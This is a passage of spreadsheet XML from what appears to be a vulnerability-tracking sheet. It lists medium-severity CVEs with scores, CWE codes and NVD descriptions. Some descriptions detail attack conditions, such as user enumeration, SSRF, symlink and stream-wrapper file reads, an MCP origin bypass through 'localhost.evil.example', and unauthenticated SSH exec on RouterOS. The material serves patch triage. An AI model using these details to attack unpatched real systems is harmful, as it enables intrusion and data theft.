      <c r="A3575" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54739</t>
        </is>
      </c>
      <c r="C3575" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3575" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3575" s="5" t="inlineStr"/>
      <c r="F3575" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3575" s="5" t="inlineStr"/>
      <c r="H3575" s="5" t="inlineStr"/>
      <c r="I3575" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3575" s="5" t="inlineStr"/>
      <c r="K3575" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="L3575" s="5" t="inlineStr">
        <is>
          <t>Lemmy is a link aggregator and forum for the fediverse. Prior to 0.19.19 and 1.0.0-beta.1, Lemmy's login endpoint in crates/api/api/src/local_user/login.rs returns different errors depending on whether the username_or_email value exists. LocalUserView::find_by_email_or_name propagates a NotFound response for an unknown account, while an existing account with a wrong password returns LemmyErrorType::IncorrectLogin. This observable response discrepancy, including HTTP 404 for a nonexistent account and HTTP 400 for an incorrect password on an existing account, allows an unauthenticated attacker to confirm registered usernames or email addresses and use the results for targeted credential attacks or social engineering. This issue is fixed in versions 0.19.19 and 1.0.0-beta.1.</t>
        </is>
      </c>
      <c r="M3575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54739</t>
        </is>
      </c>
    </row>
    <row r="3576">
      <c r="A3576" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54768</t>
        </is>
      </c>
      <c r="C3576" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3576" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3576" s="5" t="inlineStr"/>
      <c r="F3576" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3576" s="5" t="inlineStr"/>
      <c r="H3576" s="5" t="inlineStr"/>
      <c r="I3576" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J3576" s="5" t="inlineStr"/>
      <c r="K3576" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="L3576" s="5" t="inlineStr">
        <is>
          <t>WPGraphQL provides a GraphQL API for WordPress sites. From 2.0.0 until 2.15.1, the deprecated user field on SendPasswordResetEmailPayload lets an unauthenticated caller distinguish existing author-class accounts through the sendPasswordResetEmail mutation and obtain public profile fields. This issue is fixed in version 2.15.1.</t>
        </is>
      </c>
      <c r="M3576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54768</t>
        </is>
      </c>
    </row>
    <row r="3577">
      <c r="A3577" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55371</t>
        </is>
      </c>
      <c r="C3577" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3577" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3577" s="5" t="inlineStr"/>
      <c r="F3577" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3577" s="5" t="inlineStr"/>
      <c r="H3577" s="5" t="inlineStr"/>
      <c r="I3577" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3577" s="5" t="inlineStr"/>
      <c r="K3577" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-476</t>
        </is>
      </c>
      <c r="L3577" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR high-dynamic-range image file format, widely used in the motion picture industry. Versions 3.4.0 through 3.4.12 contain a NULL pointer dereference in the OpenEXRCore function exr_attr_set_bytes(). The public setter validates the top-level exr_attr_bytes_t value pointer but does not verify that the nested type_hint pointer is non-NULL when hint_length is greater than zero. When a caller supplies a positive hint_length together with a NULL type_hint, exr_attr_bytes_create() allocates a destination type-hint buffer and then copies from the NULL source pointer, causing a deterministic crash. The flaw is reachable through the public OpenEXRCore C API and results in a denial of service. The issue is fixed in version 3.4.13.</t>
        </is>
      </c>
      <c r="M3577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55371</t>
        </is>
      </c>
    </row>
    <row r="3578">
      <c r="A3578" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55529</t>
        </is>
      </c>
      <c r="C3578" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3578" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3578" s="5" t="inlineStr"/>
      <c r="F3578" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3578" s="5" t="inlineStr"/>
      <c r="H3578" s="5" t="inlineStr"/>
      <c r="I3578" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3578" s="5" t="inlineStr"/>
      <c r="K3578" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-346</t>
        </is>
      </c>
      <c r="L3578" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, the MCP HTTP Stream _validate_origin method accepts request_origin.startswith(allowed), so the attacker-controlled localhost.evil.example HTTP origin matches the localhost allowlist. Without an API key, a malicious webpage can submit tools/call requests to the local MCP server and execute exposed tools. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M3578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55529</t>
        </is>
      </c>
    </row>
    <row r="3579">
      <c r="A3579" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55678</t>
        </is>
      </c>
      <c r="C3579" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3579" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3579" s="5" t="inlineStr"/>
      <c r="F3579" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3579" s="5" t="inlineStr"/>
      <c r="H3579" s="5" t="inlineStr"/>
      <c r="I3579" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3579" s="5" t="inlineStr"/>
      <c r="K3579" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="L3579" s="5" t="inlineStr">
        <is>
          <t>Arc is an open, SQL-native time-series database for telemetry. From 26.02.1 until 26.06.2, Arc Enterprise clustering accepts cluster join requests without authentication when cluster.enabled is true but cluster.shared_secret is not configured. The defaults in internal/config/config.go set cluster.enabled to false, cluster.cluster_name to arc-cluster, cluster.coordinator_addr to :9100, cluster.shared_secret to an empty value, and cluster.tls_enabled to false, while cmd/arc/main.go requires cluster.shared_secret only when cluster.replication_enabled is true. JoinRequest in internal/cluster/protocol/messages.go accepts attacker-controlled node_id, role, raft_addr, api_addr, and coord_addr values, plus optional auth_nonce, auth_timestamp, and auth_hmac fields. The join path in internal/cluster/coordinator.go validates HMAC authentication only when the configured shared secret is non-empty and otherwise proceeds after only the cluster-name check. An accepted node is marked healthy, added as a Raft voter or registered locally, and becomes available through internal/cluster/registry.go to the routing logic in internal/cluster/router.go. The forwardRequest path in internal/cluster/router.go builds its target from node.APIAddress and copies Authorization and x-api-key headers with the request, so a rogue node selected for a forwarded query or write can receive authentication headers, request bodies, database and measurement names, and operational metadata. Heartbeat in internal/cluster/protocol/messages.go also lacks HMAC fields, and internal/cluster/coordinator.go updates node state from supplied node_id and state values without authentication. An unauthenticated network attacker who can reach the coordinator port and knows the cluster name can therefore become a trusted cluster node, mutate cluster membership, be submitted as a Raft voter, intercept topology-dependent forwarded requests, divert or forge operations, and blackhole or delay traffic. The default standalone configuration is not reachable because cluster.enabled is false, but Enterprise cluster deployments with clustering enabled and no shared secret are affected. This issue is fixed in version 26.06.2.</t>
        </is>
      </c>
      <c r="M3579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55678</t>
        </is>
      </c>
    </row>
    <row r="3580">
      <c r="A3580" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55758</t>
        </is>
      </c>
      <c r="C3580" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3580" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3580" s="5" t="inlineStr"/>
      <c r="F3580" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3580" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3580" s="5" t="inlineStr"/>
      <c r="I3580" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J3580" s="5" t="inlineStr"/>
      <c r="K3580" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3580" s="5" t="inlineStr">
        <is>
          <t>CC: Tweaked is a mod for Minecraft which adds programmable computers, turtles, and more to the game. Prior to 1.120.0, the SSRF protection in projects/core/src/main/java/dan200/computercraft/core/apis/http/options/AddressPredicate.java blocks the RFC 6052 64:ff9b::/96 NAT64 prefix but omits the RFC 8215 64:ff9b:1::/48 local-use prefix. On a dual-stack server using RFC 8215 NAT64, an unauthenticated user who can execute Lua code can use http.request or http.websocket with an address under 64:ff9b:1::/48 to reach loopback, RFC 1918, cloud metadata, or internal API endpoints because PrivatePattern.matches() does not classify the mapped IPv6 address as private. This issue is fixed in version 1.120.0.</t>
        </is>
      </c>
      <c r="M3580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55758</t>
        </is>
      </c>
    </row>
    <row r="3581">
      <c r="A3581" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56758</t>
        </is>
      </c>
      <c r="C3581" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3581" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3581" s="5" t="inlineStr"/>
      <c r="F3581" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3581" s="5" t="inlineStr"/>
      <c r="H3581" s="5" t="inlineStr"/>
      <c r="I3581" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J3581" s="5" t="inlineStr"/>
      <c r="K3581" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3581" s="5" t="inlineStr">
        <is>
          <t>The ACSE layer contains a flaw in the processing of AARQ PDUs during MMS
 connection establishment. When parsing certain fields within the 
calling AP title, an attacker controlled length value of zero or one may
 cause the parser to read past the end of a heap buffer.</t>
        </is>
      </c>
      <c r="M3581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56758</t>
        </is>
      </c>
    </row>
    <row r="3582">
      <c r="A3582" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57160</t>
        </is>
      </c>
      <c r="C3582" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3582" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3582" s="5" t="inlineStr"/>
      <c r="F3582" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3582" s="5" t="inlineStr"/>
      <c r="H3582" s="5" t="inlineStr"/>
      <c r="I3582" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3582" s="5" t="inlineStr"/>
      <c r="K3582" s="5" t="inlineStr">
        <is>
          <t>CWE-193</t>
        </is>
      </c>
      <c r="L3582" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit d6a0e7f, a buffer overflow can occur in pjsip_generic_array_hdr_print() in pjsip/src/pjsip/sip_msg.c, the function that serializes generic array headers (such as Allow, Require, Supported, and Unsupported). Under certain output-buffer boundary conditions the function can write one byte past the end of the buffer. This is reachable mainly in applications that parse and re-serialize incoming SIP requests — for example a proxy, SBC, or B2BUA — where a remote peer can influence the serialized message. The out-of-bounds write is a single fixed byte; code execution and information disclosure are not demonstrated, and in typical pool-based allocations the byte falls within allocation slack. This issue has been patched via commit d6a0e7f.</t>
        </is>
      </c>
      <c r="M3582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57160</t>
        </is>
      </c>
    </row>
    <row r="3583">
      <c r="A3583" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61893</t>
        </is>
      </c>
      <c r="C3583" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3583" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3583" s="5" t="inlineStr"/>
      <c r="F3583" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3583" s="5" t="inlineStr"/>
      <c r="H3583" s="5" t="inlineStr"/>
      <c r="I3583" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J3583" s="5" t="inlineStr"/>
      <c r="K3583" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3583" s="5" t="inlineStr">
        <is>
          <t>A crafted IEC 60870-5-104 I-frame with TypeID 104 (C_TS_NA_1) and an 
inflated object count causes TestCommand_getFromBuffer to read one byte 
past the end of the heap-allocated message buffer.</t>
        </is>
      </c>
      <c r="M3583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61893</t>
        </is>
      </c>
    </row>
    <row r="3584">
      <c r="A3584" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62652</t>
        </is>
      </c>
      <c r="C3584" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3584" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3584" s="5" t="inlineStr"/>
      <c r="F3584" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3584" s="5" t="inlineStr"/>
      <c r="H3584" s="5" t="inlineStr"/>
      <c r="I3584" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3584" s="5" t="inlineStr"/>
      <c r="K3584" s="5" t="inlineStr">
        <is>
          <t>CWE-215</t>
        </is>
      </c>
      <c r="L3584" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The device firmware contains binaries from which debugging symbols have not been removed. This could allow an unauthenticated attacker with access to the publicly available firmware update files to more easily reverse engineer the device's firmware, facilitating the identification of further vulnerabilities.</t>
        </is>
      </c>
      <c r="M3584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62652</t>
        </is>
      </c>
    </row>
    <row r="3585">
      <c r="A3585" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62992</t>
        </is>
      </c>
      <c r="C3585" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3585" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3585" s="5" t="inlineStr"/>
      <c r="F3585" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3585" s="5" t="inlineStr"/>
      <c r="H3585" s="5" t="inlineStr"/>
      <c r="I3585" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3585" s="5" t="inlineStr"/>
      <c r="K3585" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-61</t>
        </is>
      </c>
      <c r="L3585" s="5" t="inlineStr">
        <is>
          <t>Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to 5.8.2 (and 4.5.7 on the 4.x line), Security::_checkDir() does not fully resolve symbolic links before validating that a requested path lies within a configured secure directory. An attacker able to place or reference a symlink within a directory Smarty treats as trusted (e.g., a template or config directory) could use it to point outside the intended secure directory, bypassing the containment check and reading arbitrary files accessible to the PHP process. This issue is fixed in versions 5.8.2 and 4.5.7.</t>
        </is>
      </c>
      <c r="M3585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62992</t>
        </is>
      </c>
    </row>
    <row r="3586">
      <c r="A3586" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62993</t>
        </is>
      </c>
      <c r="C3586" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3586" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3586" s="5" t="inlineStr"/>
      <c r="F3586" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3586" s="5" t="inlineStr"/>
      <c r="H3586" s="5" t="inlineStr"/>
      <c r="I3586" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3586" s="5" t="inlineStr"/>
      <c r="K3586" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3586" s="5" t="inlineStr">
        <is>
          <t>Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to 4.5.7 and 5.8.2, depending on the release line, Smarty's {fetch} handling in libs/plugins/function.fetch.php and src/FunctionHandler/Fetch.php used Security::isTrustedUri() to validate only the initial remote URL against trusted_uri when a security policy was active. For resources handled by file_get_contents(), including HTTPS URLs, PHP followed HTTP redirects by default. An attacker who could supply or influence a fetch target and had an open redirect on a trusted host could redirect the request to an attacker-chosen internal endpoint, bypass the trusted_uri allowlist, and perform server-side request forgery. This issue is fixed in versions 4.5.7 and 5.8.2.</t>
        </is>
      </c>
      <c r="M3586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62993</t>
        </is>
      </c>
    </row>
    <row r="3587">
      <c r="A3587" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62996</t>
        </is>
      </c>
      <c r="C3587" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3587" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3587" s="5" t="inlineStr"/>
      <c r="F3587" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3587" s="5" t="inlineStr"/>
      <c r="H3587" s="5" t="inlineStr"/>
      <c r="I3587" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3587" s="5" t="inlineStr"/>
      <c r="K3587" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3587" s="5" t="inlineStr">
        <is>
          <t>Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. From 5.0.0 until 5.8.4, Smarty's stream: resource-name handling does not adequately restrict which PHP stream wrappers and filter chains can be referenced from a template, allowing a php://filter-wrapped resource name to be used to read the contents of arbitrary local files accessible to the PHP process. An attacker able to author or influence a template's resource reference could exploit this to disclose sensitive file contents outside the intended template/config scope. This issue is fixed in version 5.8.4.</t>
        </is>
      </c>
      <c r="M3587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62996</t>
        </is>
      </c>
    </row>
    <row r="3588">
      <c r="A3588" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63033</t>
        </is>
      </c>
      <c r="C3588" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3588" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3588" s="5" t="inlineStr"/>
      <c r="F3588" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3588" s="5" t="inlineStr"/>
      <c r="H3588" s="5" t="inlineStr"/>
      <c r="I3588" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J3588" s="5" t="inlineStr"/>
      <c r="K3588" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3588" s="5" t="inlineStr">
        <is>
          <t>A crafted IEC 60870-5-104 I-frame with a declared object count exceeding
 what fits in the ASDU body causes InformationObject_ParseObjectAddress 
to read one byte past the end of the heap-allocated message buffer.</t>
        </is>
      </c>
      <c r="M3588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63033</t>
        </is>
      </c>
    </row>
    <row r="3589">
      <c r="A3589" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63426</t>
        </is>
      </c>
      <c r="C3589" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3589" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3589" s="5" t="inlineStr"/>
      <c r="F3589" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3589" s="5" t="inlineStr"/>
      <c r="H3589" s="5" t="inlineStr">
        <is>
          <t>lenovo:dock_manager</t>
        </is>
      </c>
      <c r="I3589" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3589" s="5" t="inlineStr"/>
      <c r="K3589" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3589" s="5" t="inlineStr">
        <is>
          <t>During an internal security assessment, a potential vulnerability was discovered in Lenovo Dock Manager that could allow an authenticated local user to perform an arbitrary file deletion with elevated privileges.</t>
        </is>
      </c>
      <c r="M3589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63426</t>
        </is>
      </c>
    </row>
    <row r="3590">
      <c r="A3590" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63654</t>
        </is>
      </c>
      <c r="C3590" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3590" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3590" s="5" t="inlineStr"/>
      <c r="F3590" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3590" s="5" t="inlineStr"/>
      <c r="H3590" s="5" t="inlineStr"/>
      <c r="I3590" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J3590" s="5" t="inlineStr"/>
      <c r="K3590" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3590" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework. In version 16.31.0 and earlier, the whitelisted frappe.model.workflow.bulk_workflow_approval endpoint in frappe/model/workflow.py accepts safe HTTP methods for state-changing workflow approvals because the endpoint is not restricted to POST. An attacker can induce an authenticated victim browser to submit an approval action with the victim privileges. No released fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="M3590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63654</t>
        </is>
      </c>
    </row>
    <row r="3591">
      <c r="A3591" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66002</t>
        </is>
      </c>
      <c r="C3591" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3591" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3591" s="5" t="inlineStr"/>
      <c r="F3591" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3591" s="5" t="inlineStr"/>
      <c r="H3591" s="5" t="inlineStr"/>
      <c r="I3591" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J3591" s="5" t="inlineStr"/>
      <c r="K3591" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="L3591" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework. Prior to 15.115.0 and 16.27.0, the public request-data web form and PersonalDataDownloadRequest class in frappe/website/doctype/personal_data_download_request/personal_data_download_request.py return distinguishable response shapes for registered and unregistered email addresses, including the user_name field and persistence behavior. A remote attacker can compare the responses to enumerate registered users. This issue is fixed in versions 15.115.0 and 16.27.0.</t>
        </is>
      </c>
      <c r="M3591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66002</t>
        </is>
      </c>
    </row>
    <row r="3592">
      <c r="A3592" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66349</t>
        </is>
      </c>
      <c r="C3592" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3592" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3592" s="5" t="inlineStr"/>
      <c r="F3592" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3592" s="5" t="inlineStr"/>
      <c r="H3592" s="5" t="inlineStr"/>
      <c r="I3592" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J3592" s="5" t="inlineStr"/>
      <c r="K3592" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3592" s="5" t="inlineStr">
        <is>
          <t>The MMS server connection handler contains a flaw in its processing of 
BER-encoded request data. When an MMS confirmed request PDU containing 
an extended BER tag is received over an established session, the decoder
 may advance its internal buffer incorrectly due to a missing bounds 
check. This results in a one byte heap out-of-bounds read and causes the
 MMS service process to terminate, leading to a denial-of-service 
condition.</t>
        </is>
      </c>
      <c r="M3592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66349</t>
        </is>
      </c>
    </row>
    <row r="3593">
      <c r="A3593" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67279</t>
        </is>
      </c>
      <c r="C3593" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3593" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3593" s="5" t="inlineStr"/>
      <c r="F3593" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3593" s="5" t="inlineStr"/>
      <c r="H3593" s="5" t="inlineStr"/>
      <c r="I3593" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3593" s="5" t="inlineStr"/>
      <c r="K3593" s="5" t="inlineStr">
        <is>
          <t>CWE-841</t>
        </is>
      </c>
      <c r="L3593" s="5" t="inlineStr">
        <is>
          <t>RouterOS SSH enters the connection protocol after a client-requested rekey even though user authentication was never attempted, allowing an unauthenticated client to open a session channel and send an exec request. On affected builds the server dispatches the command, enabling unauthenticated creation, overwrite, and reconstruction of files in the RouterOS managed file namespace, including support files containing configuration and diagnostic data.This issue was fixed in versions: 6.49.21 (Long-term), 7.23.4 (Long-term) and 7.24.2 (Stable)</t>
        </is>
      </c>
      <c r="M3593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67279</t>
        </is>
      </c>
    </row>
    <row r="3594">
      <c r="A3594" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67339</t>
        </is>
      </c>
      <c r="C3594" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3594" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3594" s="5" t="inlineStr"/>
      <c r="F3594" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3594" s="5" t="inlineStr"/>
      <c r="H3594" s="5" t="inlineStr"/>
      <c r="I3594" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
